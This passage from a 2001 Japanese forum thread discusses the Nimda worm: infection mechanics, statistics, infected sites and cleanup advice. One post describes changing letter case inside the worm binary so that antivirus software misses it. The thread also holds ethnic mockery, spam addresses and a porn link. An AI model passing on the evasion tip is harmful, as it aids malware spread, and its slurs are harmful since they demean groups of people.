だから、メディアプレーヤー反応しちゃうの。
サンプルコード手に入れるだけで・・・・というか、一行の記述コピペるだけで・・・
真似して大事起こす奴はヴァカね。
・・・・オヤチュミナチャイ。

567 :名無しさん@お腹いっぱい。:01/09/22 02:00
>>565今日もこんな時間か。そろそろ寝るか。

568 :名無しさん@お腹いっぱい。:01/09/22 02:01
>>567
ワラタ

569 :名無しさん@お腹いっぱい。:01/09/22 02:02
俺の場合下記で発病しなかったんだけどなぜ?(かなり長いです。ごめん。)

WinMe IE5.5でSP1すら入れてない VB2001入ってるもパターンファイル490
という状態で、感染しているサイトを引いてしまった(多分、日経BP関係)。
なんかブラウザが重くなったが気にせず待っていると、メディアプレーヤーが
立ち上がり、この瞬間Nimda引いたことに気付いた。
そのままPCに触らずに30秒ほど考えた後、ウインドウも何も閉じないで(全く
触らないで)ACケーブルをいきなり抜いた。
もう一度、PCを立ち上げReadme.emlとReadme.exeを検索したが見当たらない。
System.iniを確認してもShell=Explore.exeのまま。この状態だったので、悪
いとは思いつつ再度ネットに接続し、パターンファイル492をゲット。
ウイルス検索するとIEのキャッシュにReadme[1].exeが発見されるものの発病
の形跡がない。その後ネスケで問題のサイトのソース見てみるとソースの最後
にNimdaのスクリプトがちゃんとあった。

なぜ俺は助かったの? 発病のタイミングはいつ?

570 :名無しさん@お腹いっぱい。:01/09/22 02:03
>>566

これって、ニムダ以前は知られていなかったの?
はからずも元スレの未知の仕様バグ、っていう予想が当たってしまった・・。

571 :名無しさん@お腹いっぱい。:01/09/22 02:05
>>564

後。6.1よりは前かな。・・・・ と思う。

572 :名無しさん@お腹いっぱい。:01/09/22 02:07
>>569

私のノートン先生によりますと、検疫所に収まったニムダファイルとして、

C:\WINNT\Temporary Internet Files\Content.IE5\LHMMLNGA

あたりからつれてきた

main[1].html

みたいなファイルが大量にございますなあ・・。

573 :(´∀` ):01/09/22 02:10
>>570
ちがうって!!!!激しく外出バグ!!
今年の春先だよ!!
発見者がサンプル攻撃コード置いてたサイト、かなりのアクセス有ったの。
何日か待ってやっと落せたぐらい。(Eメール絡むほうだぞ)

IIS感染させるバグも、6月ぐらいだっけ??
・・・もう、本当に寝るよ。
MSテクネットのさいとで発見日付確認してみ

574 :名無しさん@お腹いっぱい。:01/09/22 02:11
>>563
>IPAが「大した事ない」なんて何時言った?
>デマ流すな。

>>506
のリンク先見ろよ。

IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件(午後4時30分時点)、翌20日は65件(同)だった。今年7月に全国的に被害の遭った「サーカム」は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

575 :ニムダって、何ムニダ?:01/09/22 02:11
ハセヨォ〜

ケンチャナョ〜

576 :名無しさん@お腹いっぱい。:01/09/22 02:12
>>569
IEのキャッシュにReadme[1].exeということは、IEのキャッシュにReadme.exeもあったということでせう。それ以前の初代Readme.exeや、感染したmain.html、main[1].html なんかはキャッシュだけにどこかのタイミングで消えたのとちゃいますか?

577 :アタタタタ…:01/09/22 02:16
ttp://itpro.nikkeibp.co.jp/free/NC/NEWS/20010921/1/
「ウイルスに狙われるのはIIS浸透の代償」とマイクロソフト阿多社長

[皆様の評価を見る]で投票すべし!

578 :名無しさん@お腹いっぱい。:01/09/22 02:17
>>572
検出したhtmlファイルのソース一番下の方のREADME.EMLって小文字で書いてある辺り、ノートパッドに
コピペって、保存してウイルススキャン掛けてみ。。。
・・・おめでとう。コレで君もウイルス作者だ(w

579 :名無しさん@お腹いっぱい。:01/09/22 02:17
>>569
WinMeの自動修復機能が働いたんじゃないのかな。
Meは割とウィルスに強い。完全じゃないけど。

ただ、そのせいで感染している事に気づきにくい。

580 :名無しさん@お腹いっぱい。:01/09/22 02:17
>>576
>キャッシュだけにどこかのタイミングで消えたのとちゃいますか?
おそらく俺もそうだと思ってます。
問題は発病するタイミング。引いたと思っても触らずにAC抜けば(発病よりまし)
助かるんじゃないかなと思って。

581 :名無しさん@お腹いっぱい。:01/09/22 02:18
これだけ被害者出しておいて、MSNはこのまま済まされてしまうの?
プライスロトがあれだけ叩かれて、一応事後報告やら出してるのに。
釈然としない。

582 :ニムダって、何ムニダ?:01/09/22 02:19
つ〜か、いまだにIIS使っているつ〜のが、蛸

583 : :01/09/22 02:20
Readme.exeじゃなくてreadme.exeだけど検索は大文字小文字OK?

584 :名無しさん@お腹いっぱい。:01/09/22 02:21
>>583
OKです。半角倍角も間違えていない自信が有ります。

585 :名無しさん@お腹いっぱい。:01/09/22 02:26
>>584
念のため今Win,WiN,wiNとかで検索かけましたが大文字小文字は関係ないようです。
どこかに大文字小文字を区別するチェックがあるのかもしれませんが、触った記憶
もないしチェックのある場所も知りません。

586 :名無しさん@お腹いっぱい。:01/09/22 02:27
↑間違えました583です

587 :名無しさん@お腹いっぱい。:01/09/22 02:37
倍角はないだろ(w

588 :名無しさん@お腹いっぱい。:01/09/22 02:38
>>574
(不本意な引用スマソ)
> >>506
> のリンク先見ろよ。
>
> IPAによると、18日深夜に確認されたニムダが初めてIPAに届け出があったのは19日。初日は19件(午後4時30分時点)、翌20日は65件(同)だった。今年7月に全国的に被害の遭った「サーカム」は11日間で700件を超えたケースと比較すると被害は少ないと見ている。

「サーカム」は主としてクライアント系に感染するウイルスだろ。
「ニムダ」は「コードレッド」と比較すべきだろう。

Webサイトの中には感染してネット接続切って、報告どころじゃないところも有ると思われ。
>>574さんスマソ)

589 :名無しさん@お腹いっぱい。:01/09/22 02:42
>>587
どういう意味?
ひょっとしてこれがアルファベットに倍角ないと思ってる? -> AA

590 :名無しさん@お腹いっぱい。:01/09/22 02:42
>>588

ここに出てくるwith9.comなんかいまだに手つかずだぜ。

http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp?MAINMODE=&MODE=VIEW&ID=14&MOVEPOS=&MOVETYPE=

dolphinnetservice.ne.jpの返事も異常に遅いし。

591 :589:01/09/22 02:44
日本語勉強しに逝ってきます。

592 :ログからの引用ですが・・。:01/09/22 02:44
Load.exeをバイナリエディタで開いて
 <HTML>〜</HTML>
の間の文字を適当に大文字/小文字変換してみよう。
それだけで君も新ニムダの作者だ。

少なくとも
http://www.symantec.com/region/jp/sarcj/defs.download.html
の最新バージョンには引っかからなくなる。
(そんなチェックで良いのか?>Symantec)

593 :名無しさん@お腹いっぱい。:01/09/22 02:47
おいおい、画面にITとか書いておいて、いまごろ感染はないだろう・・。

愛知県尾張繊維技術センター
ttp://www.fdc.or.jp/owari/cad/

594 :名無しさん@お腹いっぱい。:01/09/22 02:47
そんなチェックじゃNimda.A〜Zじゃあっという間に足りなくなるね

595 :名無しさん@お腹いっぱい。:01/09/22 02:49
>>593

どうも放置してあって無傷だったのが、確認のためLAN接続してファイル開いてみて、最後におみやげ置いていってるようなケースがあると思われ・・。

596 :名無しさん@お腹いっぱい。:01/09/22 02:51
なんでシェア6割のapacheってウイルスに狙われないの?

シェア大きい方が狙われるんじゃないの?

597 :名無しさん@お腹いっぱい。:01/09/22 02:53
どうでもいいけど、感染されようとするときreadme.emlってタスクバーの下の方とかにこそっとウインドウ開くじゃないですか。こいつを 移動(M) とかで引っぱり出してくるとけっこうスゴイことになってるみたいなのよ。このナイショ窓ってがいしゅつ?

598 : :01/09/22 02:56
アパッチーunixにはwinみたいな安易なセキュリティーホールは無い。
出てもすぐ、たとえOSレベルでも完全対処される。(はず)

WINは基本構造が駄目なんで(穴だらけの小屋みたいなもん)
根本的な対処などできないんで放置。

599 :名無しさん@お腹いっぱい。:01/09/22 02:59
>>597
そうそう、内緒窓開くよ!
あれどうやってもみれないんだけど

600 : :01/09/22 02:59
たとえがちょっと悪いけど、2ちゃんねる閉鎖問題の時に感じたこと。

Win = 2ちゃんねる閉鎖問題が浮上するまであらゆる問題が放置されてたread.c
UNIX = UNIX・プログラム技術板住人が知恵を寄せ合って作ったread.c

601 : :01/09/22 03:01
あぁ、要はオープンソースか否かってことか…。
なんかわざわざわかりづらい表現してしまったな…。

602 :名無しさん@お腹いっぱい。:01/09/22 03:02
過去24時間にニムダに感染した台数が世界で24万
トータルで59万台

ちなみにサーカム過去30日以内に感染した台数は27万

603 :名無しさん@お腹いっぱい。:01/09/22 03:05
>>602
ここまで感染早いと、徹底的に駆除されてかえって鎮圧も早いかもよ。

604 :名無しさん@お腹いっぱい。:01/09/22 03:08
http://wtc.trendmicro.com/wtc/

まぁ、ここでも見てやってくだせえ

605 :名無しさん@お腹いっぱい。:01/09/22 03:11
どんどん増えてない?

606 :名無しさん@お腹いっぱい。:01/09/22 03:12
ペースは落ちてるそうだ(そうは見えないが)

607 :名無しさん@お腹いっぱい。:01/09/22 03:14
9/21朝8時ごろは過去24時間で7万だった

608 :名無しさん@お腹いっぱい。:01/09/22 03:15
サーカムの100倍じゃん

609 :名無しさん@お腹いっぱい。:01/09/22 03:17
いずれにしろ俺の立場では603の説を信じたい。

610 :名無しさん@お腹いっぱい。:01/09/22 03:19
現在、日本は10300

611 :名無しさん@お腹いっぱい。:01/09/22 03:23
>>369

>「中国一号」,100万人に感染か──人民日報
>http://www.zdnet.co.jp/news/bursts/0109/21/people.html

http://j.peopledaily.com.cn/2001/09/20/jp20010920_9603.html
http://www.peopledaily.com.cn/GB/it/49/150/20010919/564908.html

これを真に受けてさがしに行ったが、
http://cn.yahoo.com/
このへんから
http://www.dongguan.gd.cn/
このへんまで、いたって平常営業中。

日本だったらすぐニムダ閉じサイトぐらいみつかるのに。
http://www.hyundaijapan.co.jp/
こことか。

するってえと、この記事はうちはこ〜んなにインターネット普及しちゃってるんです、という宣伝か?100万「人」という単位もよくわからんし・・。


関係ないけど
http://www.dgheliushan.com/
ここオモロイ。

612 :名無しさん@お腹いっぱい。:01/09/22 03:24
IEで感染した人は、パソコン自体の感染とメール送信だけなの?
追加で 他の IISを攻撃にも行くの?


あと、IISで感染した人んところは、ページ変えて他の IIS攻撃するだけなの?
追加でメール送信もするの?

613 :名無しさん@お腹いっぱい。:01/09/22 03:26
>>599

タスクバーのタスクを右クリックで 移動(M) して↑キーとか押すと引っぱり出せるよ。

614 :名無しさん@お腹いっぱい。:01/09/22 03:27
>>598
apache本体には数年前からセキュリティホールは出ていない。

apacheへの追加機能のモジュールに時々セキュリティホールが報告される。

615 :名無しさん@お腹いっぱい。:01/09/22 03:29
>>604

やっぱ中国>>611、ニムダなんか来てないじゃん・・。中華ネタか?

616 :名無しさん@お腹いっぱい。:01/09/22 03:32
>>611
中国ってどのあたりのIPなのかね?
うちのWebサーバに来るのは 61.*.*.* ってログばかり
会社のWebサーバに来るのは 210.*.*.* ばかりなのだが。

617 : :01/09/22 03:35
ガイシュツかもしれないけど、アクティブなウイルス調査集計。
煮無駄は2位のサーカムを2倍以上引き離してトップ。
http://wtc.trendmicro.com/japanese/

618 :名無しさん@お腹いっぱい。:01/09/22 03:37
>>604
http://wtc.trendmicro.com/wtc/
によると、中国ではやってる

VBS_HAPTIME.A
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_HAPTIME.A

を日本の
http://www.trendmicro.co.jp/virusinfo/default1.asp
で検索しても情報がなにも書いてない・・。

中華文明はかかるウイルスもちがうのだろうか。

619 :名無しさん@お腹いっぱい。:01/09/22 03:40
非難されるべきは、
大事になるまでパッチ宛てやWEBサーバーの隔離(内外問わず)を怠った管理者だろ。

620 : :01/09/22 03:44
2位はサーカムじゃなかた。
VBS_HAPTIME.A

621 :名無しさん@お腹いっぱい。:01/09/22 03:44
>>369

>「中国一号」,100万人に感染か──人民日報
>http://www.zdnet.co.jp/news/bursts/0109/21/people.html

やはりそれらしきものに感染している気配がない。
http://wtc.trendmicro.com/wtc/
http://cn.yahoo.com/

よって人民日報「ジサクジエンデシタ(・∀・)」決定!!

622 :名無しさん@お腹いっぱい。:01/09/22 03:46
>>620

これってどんなのよ。

623 :名無しさん@お腹いっぱい。:01/09/22 03:49
アフリカではやってる

PE_FUNLOVE.4099
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_FUNLOVE.4099

も未知・・。

624 :名無しさん@お腹いっぱい。:01/09/22 03:51
今回の IE経由の感染てのは、内部的には

1.readme.emlが Outlook(Express)に関連付けられていることにより、Outlook(Express)が起動される。
2.Outlook(Express)がマルチパートの HTMLメールに対応していると IEが起動される。
 Outlook(Express)のバージョンは IE5以上とセットで入るものならマルチパート対応。IE4とセットで入るバージョンは非対応。
3.マルチパートHTMLの MIMEタイプが audio/x-wav になっているため、無条件にヘルパーアプリ(メディアプレーヤー等)が呼ばれる。
4.ファイル名が readme.exe になっているので、ダウンロードするものの *.wavとしての実行ではなく *.exeとして実行される。
 この時、IE(実際には Shdocvw.dll)のバージョンが低いといきなり実行する。ある程度以上高いと呼んでよいかどうか確認が出る。

てなことになるのか?
間違ってたらフォローくれ。

625 : :01/09/22 03:54
トレンドマイクロのリアルタイム集計ってどうやってんだろ?
感染ファイル数ってどうやって調べるんだろか?

626 :名無しさん@お腹いっぱい。:01/09/22 03:55
>>625

ういるすばすたについているリアルタイム報告機能の集計だろうな。

627 : :01/09/22 03:56
なる

628 :名無しさん@お腹いっぱい。:01/09/22 03:56
今回のニムダの IIS側の感染は、>>616 にあるように攻撃の IPがセグメント化されているので、
あらゆるセグメントで同じ条件でアタックログを取得しないと比較できないのではないだろうか?

629 :名無しさん@お腹いっぱい。:01/09/22 03:57
>>628

あ、つまり中国は結果的に仲間はずれかも、って?

630 :名無しさん@お腹いっぱい。:01/09/22 03:58
>>624
んじゃ、*.emlと Outlook(Express)の関連付けを外すと防げるわけか?

MIMEタイプが audio/x-wavじゃなくて image/gif とかだとどうなるのだろうか?

631 :名無しさん@お腹いっぱい。:01/09/22 04:02
>>627

ういるすばすたって、シリアルだけじゃダメでキーもらう方式でしょう?XPでいうアクティベーション(ちとちがう)みたいな。

だからロシア・さうすこりあ・中華帝国のようなピーコ大国はこの図の感染数が少ないと思ware(w

632 :名無しさん@お腹いっぱい。:01/09/22 04:10
>>631
最新ウイルスには感染しても報告できないワケか(´Д`)

633 :名無しさん@お腹いっぱい。:01/09/22 04:12
>>632
んだ

しかも人口の割に報告総数が異常に少ないと思ware(w

634 :名無しさん@お腹いっぱい。:01/09/22 04:57
ニムダは北米大陸で使われているIP狙いだそ。(一部豪州)
最初はtripodみたいなフリーのホームページからじゃないの?

635 :対策済:01/09/22 05:40
info@news.luckycherrycasino.com

jimsrelaysdotnet@wherehasmyworldgone.com


smm46@delphi.com

xw76snrh7s@hotmail.com


at2nhpfjr6wxt@mail.forum.dk

636 :名無しさん@お腹いっぱい。:01/09/22 06:18
モロ、無修正画像サイト発見!

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

637 :名無しさん@お腹いっぱい。:01/09/22 06:44
    <_」     //             ,,-''ヽ、
       、-//            ,, -''"    \
        \イ           _,-'"        \
         .'          /\           \ 
              __   //\\           \
  _/          /|[]::::::|_ / \/\\         /
   ゙         ./| ̄ ̄ ̄ ̄ //\ \/  \      //    ___
         |  |:::「「「「「「 / \/\  /\\   /:::/   ./|    |__  ラディンめ、いたずら
       _..|  |:::LLLLL//\ \/  \/\\/::::::/  /  | ロ  .|lllllllllllll ばかりしおって!
      / llllll|  |:::「「「「 / \/\  /\ .\/ ./::::::::/  / ./ .|    |    ζ
__     llllll|  |:::LLL.//\ \/  \/\  /::::::::/   | /  .| ロ  / ̄ ̄ ̄ ̄\
(666     llllll|  |:::「「「/ \/\  /\ \/ /::::::::/   | ||/ ..|   /         \
         llllll|  |:::LL//\ \/  \/\ ./::::::::/    .| ||/ ..|  ./\   \   /|
         |  |:::「./ .\/\  /\ \/ /::::::::/⌒ヽ、 .| ||/ ..|  .||||||   (・)  (・) |
         |  |:::l//\ \/  \/\_, -― 、  ''"⌒ヽ,_     (6-------◯⌒つ|
                (⌒ヽ、_,ノ⌒Y"    Y     .....⌒)..  |    _||||||||| |
            (⌒ヽー゙ ....::(   ..::.......  .__人.....:::::         ..\ / \_/ /
         _ノ⌒ヽ  Y⌒ヽ;;:::::"':::::::::::::::::::::              ..\____/
     ___(   ゙   ....:::.....  Y"  ∧_∧               /    \
   // ll__ヽ_::::::::::::::::::::::::::::::ヽ....(; ´Д`) あああ       ⊂  )   ノ\つ
  「    ヽO≡≡O:::::::::::::::::::::::::::::::::::/ つ  _つ              (_⌒ヽ
  ゙u─―u-――-u         人  Y                 ヽ ヘ }
                     し'(_)            ε≡Ξ ノノ `J

638 :名無しさん@お腹いっぱい。:01/09/22 07:46
>>618
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=VBS%5FHAPTIME%2EA
あるやん

639 :名無しさん@お腹いっぱい。:01/09/22 07:51
ニムダ、過去24時間で28万台突破(ちなみに昨日のこの時間では7万台)
過去30日では64万台

640 :名無しさん@お腹いっぱい。:01/09/22 07:59
日本は15200

641 :名無しさん@お腹いっぱい。:01/09/22 08:59
Win2k って,OE アンインストできないの?

642 :名無しさん@お腹いっぱい。:01/09/22 09:16
>>641
http://support.microsoft.com/support/kb/articles/Q263/8/37.asp
自作自演,逝きます。

643 : :01/09/22 09:28
>>641
簡単には出来ない。
Win2kならアクセス権(パーミッションみたいな物)を変えられるから
msimn.exeのアクセス権を、すべてのユーザーで実行できないように
すればいいよ。

644 :名無しさん@お腹いっぱい。:01/09/22 09:46
eml検索したらc\windows\tempから
*.emlファイルが4つ出てきた。関係ある?

645 :名無しさん@お腹いっぱい。:01/09/22 09:58
疑問なんだが、なんでWFP(WinFileProtection)が効かないんだ。
rich*.dllとかウイルスにやられてもオリジナルから書き戻してくれそうなんだけど。
実際にはウイルスつきを大事に保管してるみたいじゃん。ウイルスが対策してんのかな。

646 :名無しさん@お腹いっぱい。:01/09/22 10:47
>>644

あなたが外見急行を普段使っていないのなら非常にヤヴァイ。

ちゃんとしたウイルススキャンを望む。

647 :名無しさん@お腹いっぱい。:01/09/22 11:02
>>644
メモ帳で開いてみ。

base64でエンコードされた readme.exeがあったらソレ。

しかし「ファイルが存在する」ってのと「感染している」ってのは別物。

648 :名無しさん@お腹いっぱい。:01/09/22 11:13
すいません、メモ帳で開くってどうやるんですか?
拡張子変えるの?

トレンドマイクロっていうところで
スキャンしたけど、感染はないって云われた。
PC買った時についてきたウィルス駆逐ソフトは
重い上に古くなってしまったので最近ぜんぜん使ってない…

649 :名無しさん@お腹いっぱい。:01/09/22 11:19
ニムダ、過去24時間で30万台突破
過去30日では68万台

日本は16500

650 :名無しさん@お腹いっぱい。:01/09/22 11:26
ttp://www.fdc.or.jp/owari/cad/

こういうところに限って連絡先がない・・。

651 :名無しさん@お腹いっぱい。:01/09/22 11:30
なにげに Windows Update へ行ってみたら
「Internet Explorer 5.5 Service Pack 1 とインターネット ツールをダウンロードしてください!」
だってぇ〜・・・・ダメじゃん。

652 :名無しさん@お腹いっぱい。:01/09/22 11:31
>>648

>>拡張子変えるの?

でし。>.txt


>トレンドマイクロっていうところで
>スキャンしたけど、感染はないって云われた。

これを機会に体験版ぐらいダウンしとけ


>PC買った時についてきたウィルス駆逐ソフトは
>重い上に古くなってしまったので最近ぜんぜん使ってない…

正解。たぶんついてきたのはこれだろう。
http://slashdot.jp/article.pl?sid=01/08/21/0428210

しかし、まったく使わないのはいかん。ちゃんとしたブロック機能のあるものの使用を検討されたし。
ちなみに今はのーとん先生使ってるが感染サイトhttp://www.fdc.or.jp/owari/cad/とか開いても平気なので助かってる。

653 :名無しさん@お腹いっぱい。:01/09/22 11:33
>>651
>なにげに Windows Update へ行ってみたら

バックドアを仕掛けようとするなんてここも感染サイトか?(w

654 :名無しさん@お腹いっぱい。:01/09/22 11:36
>>650

http://www.fdc.or.jp/

トップを閉じただけで放置だ( ̄△ ̄;

655 :名無しさん@お腹いっぱい。:01/09/22 11:38
>>648

ちゃんと購入して最新のものを常時使わないと意味ナイ。

656 :名無しさん@お腹いっぱい。:01/09/22 11:44
>>645

OSはどれよ?

657 :名無しさん@お腹いっぱい。:01/09/22 11:46
TXTに直して、README検索したけどなかったよ。
ウチはOE使ってないし、なんだろうこのemlファイルは???
でも感染してないみたいだから、まあいいか。

駆逐ソフトは高くてな。
ぞぬ入れてIE・ぞぬ共にセキュリティ高で
細々と凌いでます。

658 :名無しさん@お腹いっぱい。:01/09/22 11:48
あーあ、サイトごと閉鎖になっちゃった。

http://www.with9.com

たぶんケーブル抜いたと思われ。

http://www.with9.com/mag/0009-1h/0009-1h.asp
(感染してたページ)
連休中は回復しないのかな。

659 :名無しさん@お腹いっぱい。:01/09/22 11:50
>>653
タイトルしかみてねーだろ。ちゃんと良く見ろよ。

660 :名無しさん@お腹いっぱい。:01/09/22 11:54
>>657

>駆逐ソフトは高くてな。

ソフトでも安い部類のこいつらが買えないようじゃ、それこそタダでついてきた 穴あきIEや穴あきOEぐらいしか使うものないわな・・。

661 :名無しさん@お腹いっぱい。:01/09/22 11:57
>>654
今は逝けるよ。
しかしここ一昨日電話したのにまだ直ってなかったんだね。(w

662 :661:01/09/22 12:01
と思ったらまた繋がんなくなった。
愛知県だね。

663 :名無しさん@お腹いっぱい。:01/09/22 12:01
>>661

いや漏れはトップはダメで逝けるのはここだけ・・。

ttp://www.fdc.or.jp/owari/cad/

664 :661:01/09/22 12:05
>>663
ついさっきまで繋がったんだけどね。どうやらまた切ったようだ。

一宮地場産業 ファッションデザインセンター
ここだよ。

665 :名無しさん@お腹いっぱい。:01/09/22 12:10
>>664

で、検索したらここが出た。

http://www.kttnet.co.jp/JIBASAN/jibasan/link/index.htm

(財)石川県地場産業振興センター
↑ここ、感染しちゃったのかな?(w

666 :661:01/09/22 12:14
>>665
いや、そこはBSDとApacheだから大丈夫だと思う。
http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=http://www.kttnet.co.jp/JIBASAN/jibasan/link/index.htm

単にgoogleでwww.fdc.or.jpで検索しただけ。

667 :名無しさん@お腹いっぱい。:01/09/22 12:21
http://www.hyundaijapan.co.jp

ここも閉じたままニダ。

ニムダに感染したニダ。

直し方がわからないニダ。

668 :名無しさん@お腹いっぱい。:01/09/22 12:23
>>657

これが高いというならネットになんか来るな!

---

「ウイルスバスター2001」(トレンドマイクロ株式会社)

下記ページから、NIMDA にも対応した最新の試用版をダウンロードできます。
インストールから30日間のお試し期間中は、無料でウイルスを検出・除去するこ
とができますので、是非ご利用下さい。

http://www.vector.co.jp/swreg/catalogue/vb/

669 :名無しさん@お腹いっぱい。:01/09/22 12:33
アンチウィルスベンダ各社は、」 Nimda 被害の拡大を食い止めるための感
染の検出と駆除サービスを開始した。
 サービスを行っているサイトのURLは下記であるが、必ずしも全ての感染状
態を元に戻るわけではことないので、削除後も注意が必要である。
 Nimda は、レジストリを書き換えたり、LAN上の他のコンピュータ上の共有
ファイルへの感染など複合的な影響を与える。
 そのため駆除サービスを受けても必ずしも完全に元の状態に戻るわけではな
いことに十分注意が必要である。
 また、駆除後は、マイクロソフト社の最新パッチをあてる必要がある。

トレンドマイクロ 感染検出、駆除、手動駆除など
http://www.trendmicro.co.jp/nimda/

日本ネットワークアソシエイツ 感染検出、駆除方法、駆除ツールなど
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.nai.com/japan/nimdatool.asp

シマンテック 最新情報とアンチウィルス定義ファイルの提供
検出、駆除サービスは行っていない
http://www.symantec.co.jp/region/jp/sarcj/nimda.html

Scan Security Wire Nimdaなどほとんどの攻撃からIISを自動防御するツール
http://www.vagabond.co.jp/c2/scan/secureiisweb.html

また、IPAの情報も更新されている
http://www.ipa.go.jp/security/topics/newvirus/nimda.html

670 :わはは:01/09/22 12:34
中国一号だってよ。
「中国一号」,100万人に感染か──人民日報
http://www.zdnet.co.jp/news/bursts/0109/21/people.html
ダチワイフかとオモタ

671 :名無しさん@お腹いっぱい。:01/09/22 12:34
>>668
おお、無料ならオッケーだ。

ごめん、折れ今無収入だから100円も惜しいんだ。

672 :名無しさん@お腹いっぱい。:01/09/22 12:36
あれえ?

なんだか話がちがうような・・。

電子メールで感染、ウイルス「Apost」が韓国に上陸
http://japanese.joins.com/php/article.php?sv=jnews&src=biz&cont=biz0&aid=20010905214652300
「README.EXE」ファイルが添付され発送される

673 :名無しさん@お腹いっぱい。:01/09/22 12:37

このへんがニムダは韓国産と言われるゆえんか?

http://cnet.sphere.ne.jp/i/010919-32.html
韓国から最初にこのワ-ムが到着した。

674 :名無しさん@お腹いっぱい。:01/09/22 12:41
>>670

>「中国一号」,100万人に感染か──人民日報
>http://www.zdnet.co.jp/news/bursts/0109/21/people.html

が、それらしきものに感染している気配がない。
http://wtc.trendmicro.com/wtc/
http://cn.yahoo.com/

これは人民日報が中華帝国はPCも普及しているということをアピールしたかったのだろう。

よって人民日報「ジサクジエンデシタ(・∀・)」決定!!

675 : :01/09/22 12:43
>>670 中国人はWindowsで動いてると思われ。

676 :名無しさん@お腹いっぱい。:01/09/22 12:47
つーか、今現在、Apacheのログに残ってるのは
殆ど中国、韓国、台湾なんだよね。
対応が遅いのは逆に恥を晒すだけだぞ。

677 :名無しさん@お腹いっぱい。:01/09/22 12:47
>>675
>>>670 中国人はWindowsで動いてると思われ。

ちがわいっo(><)o
http://www6.plala.or.jp/private-hp/samuraidamasii/tamasiitop/robotyuugoku/robotyuugoku.htm

678 :名無しさん@お腹いっぱい。:01/09/22 12:49
>>676

ピーコ大国なので、ウイルスバスターのWare持っててもレジキーが送られてこないと思われ。

679 :名無しさん@お腹いっぱい。:01/09/22 12:54
>>678
とすると、これはテロとの関連は一切なくビルゲイツが仕組んだ
ワレザー撲滅運動の一環だと思われ(w

680 :名無しさん@お腹いっぱい。:01/09/22 12:58
これ見るとピーコ大国は人口の割に報告数が少なすぎると思われ。

http://wtc.trendmicro.com/wtc/

681 :名無しさん@お腹いっぱい。:01/09/22 13:02
>>680

おいおい、韓国で報告されてる JS_NIMDA.A ってなんだ?変種か?


682 :名無しさん@お腹いっぱい。:01/09/22 13:05
>>670
ぢつは1台のマシンに100万人群がってるからというウワサ…(w

683 :名無しさん@お腹いっぱい。:01/09/22 13:16
>>680
PE=Portable Executable (.exe型)
JS=JavaScript or JScript (HTML型)
と思われ。違うかな?

684 :名無しさん@お腹いっぱい。:01/09/22 14:15
ここって永久にこのままな気がする・・・。

ttp://www.cnet-try.ne.jp/f/fuji/index.htm

685 :名無しさん@お腹いっぱい。:01/09/22 14:16
>>682

100万台じゃなくて100万人なのって、そういう意味だったのか( ̄△ ̄;

686 : :01/09/22 14:33
http://japan.cnet.com/News/Infostand/Item/2001-0921-J-3.html?mn
マイクロソフトが『Nimda』ワーム関連の対策情報を提供する
臨時無料相談窓口を21日開設だってさ。

687 :名無しさん@お腹いっぱい。:01/09/22 14:42
↓これやっちまったんだけどどうしたらいい?(´Д`)


256 名前:名無しさん@お腹いっぱい。 本日の投稿:01/09/22 14:38


まかふぃーを手動ゴミ箱ドラッグで削除すると、ウイルスバスターがインストールできなくなるぞ。

さらにやってしまった後ではまかふぃーもアンインストールできなくなる。

最初からまかふいーが入っていた人は要注意だ!

688 :名無しさん@お腹いっぱい:01/09/22 14:52
すいません・・
過去ログで見落としたかもしれませんが教えてください。

1.IE5SP1等でnimdaで書き換えられたホームページをアクセスしたとき・・
 readme.emlファイルは、ファイルが自分のパソコンにダウンロードされてから
 IEで開かれるのですか?それとも、ファイルにはならず そのままIEで開かれ
 reame.exeがダウンロードされるのですか?
2.感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで
 再び感染するのは、どういう理屈でしょうか?

教えてください

689 :名無しさん@お腹いっぱい。:01/09/22 15:00
http://www.fdc.or.jp/owari/cad/

やっとなおったみたいだね。ヨカッターヨ(´Д`;)

690 : :01/09/22 15:04
>>689のソースを見てると直し方が素人だな。
ソースの最後の方に残骸が残ってるぞ!(藁

<p>Copyright (c) 2000 Owari Textile Research Institute, Aichi Prefectural
Government</p>
</body>
</html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

691 :初心者:01/09/22 15:16
PC初心者なので、よかったら教えてください
[マイクロソフト製品をより安心してご利用いただくための
ホームユーザー向け セキュリティ対策 早わかりガイド]
にある修正プログラムを全部入れるのが良いのですか?(かなり沢山あるのだけど)

それから、PC/AT互換機と、NEC PC-9800とは何なのか教えてください

692 :名無したんに接続中・・・:01/09/22 15:22
>>691
最近買ったマシンならあんたのは「PC/AT互換機」
[マイクロソフト製品を安心して・・・]てのがどこのものをさしているのか知らないけど、
InternetExplorer5.01, 5.5のSP2(サービスパック2)かバージョン6を入れないとだめです。

693 :名無しさん@お腹いっぱい。:01/09/22 15:45
>>692

>InternetExplorer5.01, 5.5のSP2(サービスパック2)かバージョン6を入れないとだめです。

バージョン6はダメです。

694 : :01/09/22 15:49
>>693
なんで?

695 :初心者:01/09/22 15:50
[マイクロソフト製品をより安心してご利用いただくための
ホームユーザー向け セキュリティ対策 早わかりガイド]
とは
http://www.microsoft.com/japan/enable/products/security/
です

696 :名無しさん@お腹いっぱい。:01/09/22 16:02
>>694

>>505みてちょ。

---

>>494

みてね。

貴重な人柱さんの体験
>>293
>>389
>>400
>>402
>>403

http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
Nimda ワーム の影響を受ける恐れのある製品


MicrosoftR Internet Explorer 6 (最小構成時のみ)

#なお、本当に最小構成時のみなのかは疑惑視されています。

697 :名無しさん@お腹いっぱい。:01/09/22 16:08
>>688

>2.感染して作られた〜.emlをマイコンピュータやエクスプローラーでクリックしただけで
> 再び感染するのは、どういう理屈でしょうか?

>>460-464みてちょ

698 :名無しさん@お腹いっぱい。:01/09/22 16:19
>>688
